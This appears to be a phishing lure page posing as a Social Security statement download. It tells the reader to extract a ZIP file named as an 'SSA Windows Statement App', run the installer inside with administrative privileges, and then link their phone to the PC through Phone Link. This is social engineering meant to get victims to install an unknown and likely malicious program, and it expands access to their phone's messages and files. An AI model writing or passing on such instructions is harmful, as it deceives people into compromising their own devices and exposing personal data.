1 How to open your Statement
Your Social Security statement has been downloaded as a ZIP archive. Follow these steps to open it:
- š Open your Downloads folder (press Ctrl + J in your browser or navigate to File Explorer ā Downloads)
- š Look for the file named: SSA_Windows_Statement_App_20260528-0325_ID6A1E.zip
- š±ļø Double-click the file to extract it (or right-click ā Extract All)
- š Open the extracted folder and run the installer/setup file inside
š” Note: This is a compressed ZIP file. Extract it before running the installer. Make sure you have administrative privileges on your computer.
2 Link your Phone to Windows (Phone Link)
To access your statement on your mobile device and stay connected, set up Phone Link (formerly "Your Phone"):
- On your PC: Open Phone Link (search for it in Start menu)
- Click "Get started" and sign in with your Microsoft account
- On your phone (Android or iPhone): Download Link to Windows from the app store
- Scan the QR code shown on your PC with your phone
- Follow the on-screen prompts to complete the connection
Once connected, you can:
- š± Access your statement directly on your phone
- š Receive call and message notifications on your PC
- š Drag and drop files between devices
- šø Use your phone's camera as a webcam (select Android devices)
